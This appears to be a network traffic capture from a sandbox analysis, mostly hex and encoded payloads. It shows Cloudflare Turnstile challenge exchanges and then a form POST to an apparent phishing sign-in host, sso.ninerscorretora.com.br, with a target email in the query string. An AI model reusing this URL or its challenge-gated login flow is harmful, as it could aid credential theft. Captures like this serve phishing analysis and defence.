2025-03-25 20:29:39 UTC	1047	IN	Data Raw: 75 33 75 55 66 71 79 56 6c 34 36 7a 67 36 61 48 76 62 79 57 6d 71 54 4a 73 73 32 74 73 4b 37 52 73 62 4f 55 6c 38 53 33 6c 62 79 37 32 35 50 43 6e 38 4b 76 31 74 66 49 76 37 37 63 71 4d 33 6f 70 65 54 71 37 61 6e 69 36 72 62 43 39 75 61 77 78 63 53 36 37 39 6f 42 7a 2f 50 61 39 62 33 57 35 4f 51 4c 78 51 48 4c 79 65 73 47 34 75 2f 36 44 78 4d 43 41 68 6e 31 42 67 6f 54 37 4f 63 61 43 65 6a 35 2b 67 51 67 35 43 50 36 33 69 41 41 39 4f 73 61 4b 43 45 48 4a 52 30 69 37 79 34 4d 4b 7a 49 54 43 52 41 4c 4e 41 30 73 2b 54 6b 4e 48 6a 6b 6a 44 30 41 56 4a 53 45 61 50 45 6c 41 52 54 74 53 52 53 30 68 56 46 56 48 51 54 63 52 56 45 70 5a 59 42 39 50 55 78 6b 73 4c 55 49 78 48 6d 70 58 4b 52 35 63 53 46 63 69 62 47 74 30 5a 32 4e 4b 61 45 42 72 59 30 77 36 5a 6b 64 Data Ascii: u3uUfqyVl46zg6aHvbyWmqTJss2tsK7RsbOUl8S3lby725PCn8Kv1tfIv77cqM3opeTq7ani6rbC9uawxcS679oBz/Pa9b3W5OQLxQHLyesG4u/6DxMCAhn1BgoT7OcaCej5+gQg5CP63iAA9OsaKCEHJR0i7y4MKzITCRALNA0s+TkNHjkjD0AVJSEaPElARTtSRS0hVFVHQTcRVEpZYB9PUxksLUIxHmpXKR5cSFcibGt0Z2NKaEBrY0w6Zkd
2025-03-25 20:29:39 UTC	1369	IN	Data Raw: 46 6a 72 2b 52 69 5a 4b 72 6c 37 47 7a 79 4a 6e 62 31 39 2b 74 7a 39 71 33 32 36 62 55 33 4c 6e 6e 36 64 32 73 36 37 43 39 33 63 50 42 34 76 61 30 7a 38 72 54 75 4f 54 77 39 62 33 4b 2b 76 7a 38 7a 67 66 38 7a 2f 33 4a 43 4d 50 64 31 67 6e 36 43 76 41 4f 33 76 33 67 46 4e 58 57 2b 52 73 46 32 76 33 65 33 64 6e 54 49 2f 62 61 42 51 51 51 47 50 77 6a 34 65 67 6f 2b 67 48 35 42 68 49 54 4a 44 41 4f 46 67 6f 6e 47 2f 4d 38 4b 53 67 39 45 43 33 34 47 7a 59 41 50 43 45 56 41 52 67 5a 4f 30 35 49 42 7a 77 61 4c 44 41 69 4a 44 41 4f 4c 42 45 72 56 41 39 51 4f 30 35 4e 56 57 52 42 4e 54 49 79 4e 6a 78 58 4e 6c 74 58 52 6a 31 49 55 55 52 68 4c 47 46 76 55 30 39 70 63 48 78 76 55 32 35 7a 50 56 74 74 65 33 78 6c 67 32 4a 46 67 47 5a 4a 57 49 57 41 69 47 5a 6c 59 56 Data Ascii: Fjr+RiZKrl7GzyJnb19+tz9q326bU3Lnn6d2s67C93cPB4va0z8rTuOTw9b3K+vz8zgf8z/3JCMPd1gn6CvAO3v3gFNXW+RsF2v3e3dnTI/baBQQQGPwj4ego+gH5BhITJDAOFgonG/M8KSg9EC34GzYAPCEVARgZO05IBzwaLDAiJDAOLBErVA9QO05NVWRBNTIyNjxXNltXRj1IUURhLGFvU09pcHxvU25zPVtte3xlg2JFgGZJWIWAiGZlYV
2025-03-25 20:29:39 UTC	1369	IN	Data Raw: 30 4c 50 59 75 73 32 78 73 4d 71 31 76 35 72 45 35 72 79 6b 35 4e 62 48 77 38 37 76 76 2b 6d 6e 78 4b 58 65 72 72 44 54 77 62 44 48 38 66 61 38 32 37 6e 64 41 75 76 38 35 65 45 46 30 67 44 32 2f 66 76 65 42 66 7a 42 2f 4e 33 51 38 52 54 4c 42 2f 63 42 37 2f 54 72 42 65 77 4e 37 78 33 30 39 51 45 64 4a 2f 55 5a 41 50 51 71 46 67 63 4d 37 43 6f 76 36 42 38 6e 38 41 59 30 4a 2b 38 47 39 79 73 46 2b 41 6f 38 4c 68 37 37 4d 78 55 77 49 52 38 69 47 6b 67 39 50 78 6c 50 51 42 34 4b 49 6a 49 52 49 6c 4e 53 56 46 55 62 4d 69 35 63 45 54 5a 4c 55 56 74 64 52 54 70 55 58 6a 30 33 58 7a 78 6a 54 6c 35 44 59 32 41 76 50 69 64 49 61 47 52 53 5a 6d 73 33 65 57 68 75 54 47 46 30 64 6b 38 2f 5a 44 39 43 5a 56 4e 5a 53 32 46 6c 54 49 74 76 63 33 35 77 6b 56 42 30 5a 6c 46 Data Ascii: 0LPYus2xsMq1v5rE5ryk5NbHw87vv+mnxKXerrDTwbDH8fa827ndAuv85eEF0gD2/fveBfzB/N3Q8RTLB/cB7/TrBewN7x309QEdJ/UZAPQqFgcM7Cov6B8n8AY0J+8G9ysF+Ao8Lh77MxUwIR8iGkg9PxlPQB4KIjIRIlNSVFUbMi5cETZLUVtdRTpUXj03XzxjTl5DY2AvPidIaGRSZms3eWhuTGF0dk8/ZD9CZVNZS2FlTItvc35wkVB0ZlF
2025-03-25 20:29:39 UTC	1369	IN	Data Raw: 4a 71 62 75 65 4c 6c 6e 70 32 7a 74 37 72 6f 37 64 32 34 79 62 76 50 78 37 76 79 7a 36 2b 33 77 65 33 72 38 2b 7a 76 7a 4e 48 62 30 39 50 63 38 4e 76 6c 34 64 58 46 77 4f 7a 4c 42 65 54 62 7a 76 41 54 37 4f 72 6f 42 4f 59 50 38 75 66 38 42 2b 72 6d 38 41 48 73 39 39 77 4e 44 68 4d 54 41 75 62 70 49 4e 34 42 4a 78 6b 4c 41 53 4c 72 43 52 45 79 46 51 73 6d 4a 67 62 30 4c 53 73 50 46 79 38 36 51 7a 63 2f 42 69 45 6c 42 45 77 4a 53 43 55 37 50 41 67 6f 4b 41 34 72 4e 31 45 79 4f 43 34 56 48 46 63 35 4c 6b 78 62 47 43 41 67 55 46 52 42 59 69 68 55 51 31 70 6b 61 6b 31 74 50 7a 4a 6f 4d 79 78 76 52 32 70 53 4d 57 6c 62 58 47 39 67 55 46 4a 31 50 45 77 39 67 6b 5a 67 64 34 52 64 5a 47 6c 34 52 5a 43 4b 55 56 32 49 69 59 4b 52 59 47 39 37 6d 5a 61 5a 62 33 6d 54 Data Ascii: JqbueLlnp2zt7ro7d24ybvPx7vyz6+3we3r8+zvzNHb09Pc8Nvl4dXFwOzLBeTbzvAT7OroBOYP8uf8B+rm8AHs99wNDhMTAubpIN4BJxkLASLrCREyFQsmJgb0LSsPFy86Qzc/BiElBEwJSCU7PAgoKA4rN1EyOC4VHFc5LkxbGCAgUFRBYihUQ1pkak1tPzJoMyxvR2pSMWlbXG9gUFJ1PEw9gkZgd4RdZGl4RZCKUV2IiYKRYG97mZaZb3mT
2025-03-25 20:29:39 UTC	1369	IN	Data Raw: 69 61 30 71 6d 68 77 36 58 57 70 2b 6e 6e 30 74 47 71 37 4e 62 56 74 4d 57 79 75 76 66 34 75 4c 48 52 41 4c 7a 54 38 73 50 45 43 64 76 70 32 39 50 35 2b 77 58 33 37 68 50 4c 37 77 73 48 44 65 51 45 38 2f 50 54 37 2b 63 58 2b 77 30 61 37 77 30 41 42 51 49 49 47 65 51 66 35 2f 33 6d 42 43 30 79 48 65 67 43 4b 77 51 34 49 77 73 36 4c 7a 45 36 42 7a 73 61 4f 67 39 44 47 53 51 57 4a 52 30 5a 41 6b 6b 71 4e 79 51 34 50 54 34 49 48 43 77 78 55 56 67 6f 57 6b 38 6b 57 44 31 54 54 45 6f 58 4d 57 51 38 52 53 39 49 50 53 49 6f 51 31 59 38 58 56 78 44 51 79 39 4e 58 44 4a 76 62 48 42 7a 59 30 67 38 63 31 78 35 56 30 74 51 4f 56 74 67 67 6b 57 43 61 58 39 73 52 6e 78 4d 62 6d 52 71 59 32 4f 4d 58 6f 70 33 54 32 36 58 69 70 5a 78 61 46 74 6f 66 58 4e 39 68 56 74 6b 6f Data Ascii: ia0qmhw6XWp+nn0tGq7NbVtMWyuvf4uLHRALzT8sPECdvp29P5+wX37hPL7wsHDeQE8/PT7+cX+w0a7w0ABQIIGeQf5/3mBC0yHegCKwQ4Iws6LzE6BzsaOg9DGSQWJR0ZAkkqNyQ4PT4IHCwxUVgoWk8kWD1TTEoXMWQ8RS9IPSIoQ1Y8XVxDQy9NXDJvbHBzY0g8c1x5V0tQOVtggkWCaX9sRnxMbmRqY2OMXop3T26XipZxaFtofXN9hVtko
2025-03-25 20:29:39 UTC	1369	IN	Data Raw: 48 79 71 4c 4b 78 71 33 48 36 50 62 50 74 4d 48 70 30 39 7a 56 75 50 66 37 74 37 2f 68 39 4e 50 35 31 2b 62 38 2f 4e 73 4e 36 66 34 47 36 74 37 64 42 73 62 2b 44 76 4d 56 44 77 7a 73 36 68 41 49 2b 52 77 42 44 2b 34 6d 42 78 6a 67 4a 66 48 36 39 76 62 6a 35 53 34 63 2b 51 7a 72 42 66 41 59 4a 76 55 49 4a 41 6e 38 50 44 51 7a 4f 42 73 5a 2f 42 6f 5a 50 30 45 65 42 6b 41 2f 47 69 41 74 48 7a 6c 4d 54 79 4d 32 4c 56 4a 57 4a 56 73 6d 4f 79 78 62 58 6a 68 66 55 6a 55 73 55 69 56 6f 55 31 55 6e 4f 55 31 63 62 47 39 4c 62 47 52 67 50 31 45 2b 63 58 4e 61 57 6c 78 5a 64 56 39 7a 64 6e 56 52 62 48 6c 4f 65 59 43 41 66 46 4d 39 57 6f 61 50 57 55 31 6e 61 58 39 74 63 33 4b 4f 6b 47 5a 76 65 32 68 56 66 48 69 5a 64 35 75 61 6d 46 2b 51 63 48 70 67 5a 4b 56 35 6e 71 Data Ascii: HyqLKxq3H6PbPtMHp09zVuPf7t7/h9NP51+b8/NsN6f4G6t7dBsb+DvMVDwzs6hAI+RwBD+4mBxjgJfH69vbj5S4c+QzrBfAYJvUIJAn8PDQzOBsZ/BoZP0EeBkA/GiAtHzlMTyM2LVJWJVsmOyxbXjhfUjUsUiVoU1UnOU1cbG9LbGRgP1E+cXNaWlxZdV9zdnVRbHlOeYCAfFM9WoaPWU1naX9tc3KOkGZve2hVfHiZd5uamF+QcHpgZKV5nq
2025-03-25 20:29:39 UTC	1369	IN	Data Raw: 71 2b 72 54 34 39 66 51 2f 50 76 50 31 4c 61 35 33 66 47 2f 37 4f 54 35 31 39 48 54 2f 74 76 4c 79 76 37 67 2f 4e 6b 43 39 50 58 54 42 66 66 67 31 67 7a 6d 32 51 2f 30 32 74 6b 43 45 64 2f 39 37 78 37 7a 32 69 55 48 34 77 49 4a 44 66 77 4f 45 52 41 42 46 68 41 52 4b 66 51 56 46 53 34 34 45 52 77 7a 49 69 4d 67 4e 79 59 68 48 6a 73 6d 4a 43 67 2b 53 43 73 73 48 53 34 77 4d 54 45 70 43 44 51 30 56 44 59 33 46 43 34 34 4f 52 68 4d 51 30 41 2f 49 54 6c 46 4e 54 34 39 52 56 39 67 53 55 30 39 54 53 52 50 4c 47 42 51 55 57 70 30 57 31 64 75 65 46 46 63 57 7a 31 65 59 48 64 77 59 32 56 56 5a 6d 6c 70 61 57 35 67 5a 6f 4e 71 5a 48 46 78 5a 6e 64 31 5a 58 5a 32 65 47 6c 78 55 48 78 39 6b 48 36 41 6c 34 4a 34 67 32 42 36 66 49 65 64 61 59 75 4c 61 49 4b 52 6a 57 75 Data Ascii: q+rT49fQ/PvP1La53fG/7OT519HT/tvLyv7g/NkC9PXTBffg1gzm2Q/02tkCEd/97x7z2iUH4wIJDfwOERABFhARKfQVFS44ERwzIiMgNyYhHjsmJCg+SCssHS4wMTEpCDQ0VDY3FC44ORhMQ0A/ITlFNT49RV9gSU09TSRPLGBQUWp0W1dueFFcWz1eYHdwY2VVZmlpaW5gZoNqZHFxZnd1ZXZ2eGlxUHx9kH6Al4J4g2B6fIedaYuLaIKRjWu

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:43 UTC	1191	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/388899321:1742930844:sP1vMOt9cepvez2L-LaawesgzBBgiC7IfsMEBenDenU/9261293dee55c468/5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 41710 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: text/plain;charset=UTF-8 cf-chl: 5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI cf-chl-ra: 0 sec-ch-ua-mobile: ?0 Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 20:29:43 UTC	16384	OUT	Data Raw: 49 6d 6c 70 7a 66 36 53 72 48 6c 69 57 43 2b 36 6e 61 4d 30 6c 4c 77 61 6b 61 67 70 57 37 37 43 42 36 52 61 58 70 55 35 50 36 73 61 4d 37 66 35 36 54 61 78 31 61 36 72 37 6d 61 4b 61 43 37 57 55 24 63 61 6f 44 66 46 61 24 41 57 31 6a 59 61 48 57 36 4f 61 6c 72 61 33 67 36 42 75 47 4f 61 35 37 61 42 35 75 6c 6b 57 61 62 61 66 6e 34 61 4d 70 66 57 72 61 24 5a 57 61 48 61 6c 57 36 55 61 69 6d 61 49 49 48 66 54 56 31 61 49 63 6d 42 6c 38 36 61 64 61 55 42 61 4c 47 42 4c 4c 63 73 52 55 66 56 32 67 70 36 49 58 63 6c 44 6a 63 70 61 62 4b 36 31 55 61 36 38 61 75 35 6e 66 4b 6a 37 61 75 47 33 35 37 63 4a 6c 44 61 78 37 48 4b 6b 24 54 6c 7a 61 61 56 73 50 61 61 59 67 79 53 61 37 4d 6c 61 58 44 61 45 35 5a 37 38 61 55 2b 2b 38 37 42 4c 2d 44 36 64 35 70 61 64 32 37 Data Ascii: Imlpzf6SrHliWC+6naM0lLwakagpW77CB6RaXpU5P6saM7f56Tax1a6r7maKaC7WU$caoDfFa$AW1jYaHW6Oalra3g6BuGOa57aB5ulkWabafn4aMpfWra$ZWaHalW6UaimaIIHfTV1aIcmBl86adaUBaLGBLLcsRUfV2gp6IXclDjcpabK61Ua68au5nfKj7auG357cJlDax7HKk$TlzaaVsPaaYgySa7MlaXDaE5Z78aU++87BL-D6d5pad27
2025-03-25 20:29:43 UTC	16384	OUT	Data Raw: 5a 31 5a 46 59 66 4f 38 59 74 64 66 6b 24 36 4c 5a 37 6f 55 55 66 66 52 77 59 35 55 6d 6a 33 6d 53 71 79 55 76 4c 57 48 69 72 4b 70 41 72 46 44 42 49 72 51 42 6f 6a 68 6c 62 72 37 70 66 49 4a 76 2d 42 57 6b 48 36 4c 70 36 61 43 55 75 4e 6a 43 76 7a 30 6f 66 59 42 61 6f 69 70 75 6d 36 6a 6d 30 70 75 2d 42 50 68 43 32 6a 43 44 4d 61 53 62 30 6d 36 66 7a 69 2d 66 2d 72 6c 57 69 2d 36 24 69 53 67 43 74 37 69 36 59 61 35 37 43 63 36 66 44 30 37 69 49 57 44 61 31 37 75 55 70 58 61 57 37 75 51 42 51 51 75 33 4b 24 6e 4b 6d 30 78 36 48 69 6d 78 31 66 77 52 69 79 6e 7a 4b 70 54 42 56 6d 42 4b 4c 24 37 2b 70 38 6d 31 6b 44 2b 37 61 50 4b 34 37 52 5a 66 72 55 73 53 56 6d 59 6e 44 51 63 33 35 49 72 55 64 37 43 61 4c 44 7a 56 57 6a 44 30 71 66 69 61 66 44 43 49 61 77 Data Ascii: Z1ZFYfO8Ytdfk$6LZ7oUUffRwY5Umj3mSqyUvLWHirKpArFDBIrQBojhlbr7pfIJv-BWkH6Lp6aCUuNjCvz0ofYBaoipum6jm0pu-BPhC2jCDMaSb0m6fzi-f-rlWi-6$iSgCt7i6Ya57Cc6fD07iIWDa17uUpXaW7uQBQQu3K$nKm0x6Himx1fwRiynzKpTBVmBKL$7+p8m1kD+7aPK47RZfrUsSVmYnDQc35IrUd7CaLDzVWjD0qfiafDCIaw
2025-03-25 20:29:43 UTC	8942	OUT	Data Raw: 41 4b 4b 2b 31 24 41 41 78 52 54 62 4c 62 42 78 56 55 49 47 77 42 34 51 4d 43 48 41 41 55 4b 53 77 52 50 61 6c 39 5a 61 58 78 2b 62 52 61 39 72 53 56 75 72 66 79 61 39 34 47 57 36 45 41 62 34 38 57 36 4d 61 52 66 37 71 6d 74 70 4e 32 24 44 36 44 61 4a 7a 67 7a 75 6a 57 6e 50 4a 59 4e 39 49 66 79 30 37 66 58 74 35 42 67 6c 4a 33 31 46 71 35 6c 73 77 4b 52 71 37 74 55 63 46 52 68 4a 47 61 41 5a 70 67 39 54 66 50 4c 56 34 58 45 63 55 52 56 70 30 6a 58 47 6e 34 35 75 73 35 48 54 62 24 47 38 68 75 47 53 30 30 39 61 32 49 2b 69 43 43 58 2d 41 37 7a 30 6e 56 7a 61 39 4f 56 6b 75 45 6f 35 66 4a 57 4c 74 4e 77 32 4b 7a 4c 41 74 2b 4c 38 45 35 39 7a 75 70 36 45 69 7a 5a 66 61 42 37 66 4e 37 6e 75 50 24 46 54 47 35 34 49 4a 61 32 4b 32 37 49 44 61 69 24 43 2b 68 74 Data Ascii: AKK+1$AAxRTbLbBxVUIGwB4QMCHAAUKSwRPal9ZaXx+bRa9rSVurfya94GW6EAb48W6MaRf7qmtpN2$D6DaJzgzujWnPJYN9Ify07fXt5BglJ31Fq5lswKRq7tUcFRhJGaAZpg9TfPLV4XEcURVp0jXGn45us5HTb$G8huGS009a2I+iCCX-A7z0nVza9OVkuEo5fJWLtNw2KzLAt+L8E59zup6EizZfaB7fN7nuP$FTG54IJa2K27IDai$C+ht
2025-03-25 20:29:44 UTC	282	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 20:29:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4928 Connection: close cf-chl-out: 38dWsKxB+EXleT3mK28DXjBhpe8Okg98gcyi+jFFbFrIAGFV5WJL0pQhLA9oX8t6SvleXQM+OB3iBKrqPe7KFa+DA312c0XjzgGWuhwQjDg=$e9Fi0WxjA/8V+RhPS2dAag==
2025-03-25 20:29:44 UTC	1467	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 52 4a 41 63 55 6a 79 7a 6a 67 4d 78 62 67 4c 50 59 78 30 68 4f 44 6f 35 4e 6d 4f 43 78 5a 6a 74 4c 52 64 64 6b 72 41 77 65 58 79 73 54 76 65 64 63 78 31 66 77 6d 6c 44 6c 4b 6e 52 70 72 43 6a 70 6b 64 4e 34 37 34 57 68 78 78 46 44 74 74 6a 58 2f 72 43 73 42 71 78 7a 73 45 76 6f 76 43 5a 59 65 66 36 43 6f 6b 30 54 30 44 6e 64 62 74 54 71 5a 35 55 52 61 5a 39 67 6a 49 51 6c 34 50 35 55 75 4d 77 77 72 49 6d 4f 4e 65 4f 79 56 6a 77 4f 34 6f 47 6a 37 39 55 55 2f 48 37 62 35 52 63 73 45 43 6a 37 2b 69 30 79 37 34 4e 62 74 46 39 54 4e 4c 48 52 30 2b 54 43 33 56 7a 47 5a 57 39 57 69 77 6f 4a 47 70 56 39 73 39 4b 72 71 77 31 4b 38 48 4c 37 69 63 44 35 70 46 45 50 63 67 57 35 62 45 2b 50 56 73 56 49 78 32 76 55 4e 39 44 55 Data Ascii: cf-chl-out-s: RJAcUjyzjgMxbgLPYx0hODo5NmOCxZjtLRddkrAweXysTvedcx1fwmlDlKnRprCjpkdN474WhxxFDttjX/rCsBqxzsEvovCZYef6Cok0T0DndbtTqZ5URaZ9gjIQl4P5UuMwwrImONeOyVjwO4oGj79UU/H7b5RcsECj7+i0y74NbtF9TNLHR0+TC3VzGZW9WiwoJGpV9s9Krqw1K8HL7icD5pFEPcgW5bE+PVsVIx2vUN9DU
2025-03-25 20:29:44 UTC	989	IN	Data Raw: 75 33 75 55 66 71 79 56 6c 34 36 7a 67 36 61 48 76 62 79 57 6d 71 54 49 7a 4b 36 71 72 38 79 6e 74 35 54 4f 78 38 2b 79 75 73 7a 4f 77 62 75 74 31 37 53 58 74 37 71 2f 70 65 4b 6f 33 65 4b 75 74 37 76 6d 73 72 76 69 31 62 4c 42 30 4f 2f 51 38 62 4f 38 37 66 54 78 2b 4f 4c 65 34 50 7a 61 33 75 66 34 33 37 33 64 77 2b 54 72 7a 63 72 67 43 77 37 66 34 77 45 48 42 67 59 64 2b 51 6f 65 46 78 6e 7a 45 52 73 6a 2f 66 34 49 4a 4f 6a 33 39 77 55 59 2b 76 77 4b 48 69 77 6c 43 79 6b 74 4a 7a 41 55 43 44 4d 65 43 42 4d 7a 45 54 6f 50 4d 79 41 50 50 78 45 2f 4b 7a 38 31 4b 30 45 2f 4b 67 73 6e 53 6a 77 30 51 51 39 43 43 30 63 55 4c 6c 6c 52 54 31 38 38 54 47 4e 59 48 54 59 33 5a 55 42 4b 52 52 35 43 4f 53 6b 70 63 6d 70 42 54 32 4a 41 63 33 64 71 64 6c 42 74 54 56 78 Data Ascii: u3uUfqyVl46zg6aHvbyWmqTIzK6qr8ynt5TOx8+yuszOwbut17SXt7q/peKo3eKut7vmsrvi1bLB0O/Q8bO87fTx+OLe4Pza3uf4373dw+TrzcrgCw7f4wEHBgYd+QoeFxnzERsj/f4IJOj39wUY+vwKHiwlCyktJzAUCDMeCBMzEToPMyAPPxE/Kz81K0E/KgsnSjw0QQ9CC0cULllRT188TGNYHTY3ZUBKRR5COSkpcmpBT2JAc3dqdlBtTVx
2025-03-25 20:29:44 UTC	1369	IN	Data Raw: 48 4a 6f 66 35 56 34 6d 6e 74 34 70 6f 68 39 73 34 65 46 62 4c 43 75 6a 34 69 35 72 6e 6d 51 6b 73 46 7a 6c 73 4b 67 6f 4d 61 66 78 70 7a 47 79 62 6d 4b 6d 5a 69 76 67 36 66 4e 6e 4a 47 67 73 4a 61 31 72 4e 72 46 6e 4c 48 67 76 4f 4b 78 6d 64 37 43 75 65 44 6d 34 37 2f 43 6f 2b 65 6b 75 66 47 36 76 66 54 70 78 73 72 42 72 38 2f 48 31 65 37 7a 79 4d 72 55 79 62 6a 7a 41 37 7a 57 38 64 54 61 32 66 51 44 79 65 4d 42 32 4f 54 63 45 63 33 56 46 2b 37 54 46 4d 77 5a 46 64 33 72 45 4e 73 4f 39 42 45 6a 39 2f 55 6c 33 79 6a 36 41 2b 63 49 2b 53 38 42 42 7a 41 6a 46 51 33 73 4e 54 72 33 37 44 6b 33 4a 68 51 39 4f 79 37 30 51 51 41 2f 2b 45 59 7a 4d 68 78 4c 50 79 55 68 55 45 74 50 49 56 52 4f 45 79 6c 48 53 79 34 74 57 6c 6f 6d 4e 45 38 73 4b 32 41 74 4a 45 51 7a Data Ascii: HJof5V4mnt4poh9s4eFbLCuj4i5rnmQksFzlsKgoMafxpzGybmKmZivg6fNnJGgsJa1rNrFnLHgvOKxmd7CueDm47/Co+ekufG6vfTpxsrBr8/H1e7zyMrUybjzA7zW8dTa2fQDyeMB2OTcEc3VF+7TFMwZFd3rENsO9BEj9/Ul3yj6A+cI+S8BBzAjFQ3sNTr37Dk3JhQ9Oy70QQA/+EYzMhxLPyUhUEtPIVROEylHSy4tWlomNE8sK2AtJEQz
2025-03-25 20:29:44 UTC	1369	IN	Data Raw: 78 33 59 6d 35 39 68 34 4a 30 74 49 39 78 64 37 69 44 76 48 75 4a 6b 72 71 57 76 36 78 39 67 73 4f 61 78 48 76 48 6c 4a 53 6b 6d 71 4b 47 6d 73 2f 52 69 36 6d 68 31 71 43 78 70 61 2f 4b 74 4e 72 64 6d 72 48 65 6e 64 37 54 72 39 61 6f 31 4c 2b 7a 74 38 76 6f 32 64 36 6a 32 2b 48 6c 39 73 75 7a 71 75 54 56 78 2f 61 35 38 2f 50 61 2f 74 58 4c 37 62 33 47 35 4e 4c 79 43 51 66 72 2f 4f 50 4a 36 4e 37 4c 43 67 6e 56 38 65 6a 67 36 75 49 5a 38 39 51 57 45 39 76 67 47 76 63 62 4a 66 54 35 35 50 30 57 2f 69 4d 76 2b 50 37 73 36 67 76 38 4e 51 34 47 42 41 73 31 4b 4f 30 64 47 2f 63 67 44 52 77 35 44 69 55 41 47 7a 45 35 50 6b 67 59 4a 69 6c 43 4b 44 6f 50 4c 53 6b 6d 49 43 6b 74 4e 44 64 53 50 46 78 4d 50 79 68 62 58 69 78 67 58 79 41 68 4e 44 67 30 59 32 31 57 5a Data Ascii: x3Ym59h4J0tI9xd7iDvHuJkrqWv6x9gsOaxHvHlJSkmqKGms/Ri6mh1qCxpa/KtNrdmrHend7Tr9ao1L+zt8vo2d6j2+Hl9suzquTVx/a58/Pa/tXL7b3G5NLyCQfr/OPJ6N7LCgnV8ejg6uIZ89QWE9vgGvcbJfT55P0W/iMv+P7s6gv8NQ4GBAs1KO0dG/cgDRw5DiUAGzE5PkgYJilCKDoPLSkmICktNDdSPFxMPyhbXixgXyAhNDg0Y21WZ
2025-03-25 20:29:44 UTC	1201	IN	Data Raw: 75 73 59 69 67 6a 36 68 31 62 72 69 32 65 6e 6d 4a 6f 36 53 73 74 72 6d 44 70 71 43 71 69 61 33 45 78 38 69 75 30 4d 71 4d 70 72 58 4f 70 6f 72 4f 79 72 76 62 30 64 6a 48 75 64 54 44 77 61 36 64 31 4c 6d 32 76 74 32 6d 78 65 4c 67 32 4c 6d 6e 34 4b 36 78 79 2b 57 30 2b 4d 76 32 7a 63 61 31 37 62 76 4b 32 2b 50 72 42 66 33 33 37 2b 62 6d 2b 76 50 64 43 4f 34 47 34 74 6f 4f 34 67 30 54 44 68 41 42 46 77 73 56 2b 76 49 52 46 2f 34 53 45 76 4d 64 46 68 63 52 45 65 45 5a 46 41 50 32 4b 53 6a 39 4a 53 50 73 43 77 51 6e 4c 75 6f 4a 4c 54 4c 35 4f 6a 62 39 46 78 6b 6b 2f 67 38 42 50 51 4e 41 42 7a 38 61 49 78 30 2f 43 30 6b 66 54 44 4d 56 52 55 55 71 54 56 6c 4a 52 54 4e 65 51 44 45 71 56 31 38 7a 58 54 6c 59 4e 6c 45 79 59 69 55 33 52 6d 68 59 54 32 42 73 4c 54 Data Ascii: usYigj6h1bri2enmJo6SstrmDpqCqia3Ex8iu0MqMprXOporOyrvb0djHudTDwa6d1Lm2vt2mxeLg2Lmn4K6xy+W0+Mv2zca17bvK2+PrBf337+bm+vPdCO4G4toO4g0TDhABFwsV+vIRF/4SEvMdFhcREeEZFAP2KSj9JSPsCwQnLuoJLTL5Ojb9Fxkk/g8BPQNABz8aIx0/C0kfTDMVRUUqTVlJRTNeQDEqV18zXTlYNlEyYiU3RmhYT2BsLT

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:44 UTC	1277	OUT	POST /?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.com HTTP/1.1 Host: sso.ninerscorretora.com.br Connection: keep-alive Content-Length: 987 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Origin: https://sso.ninerscorretora.com.br Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://sso.ninerscorretora.com.br/?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.com Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY
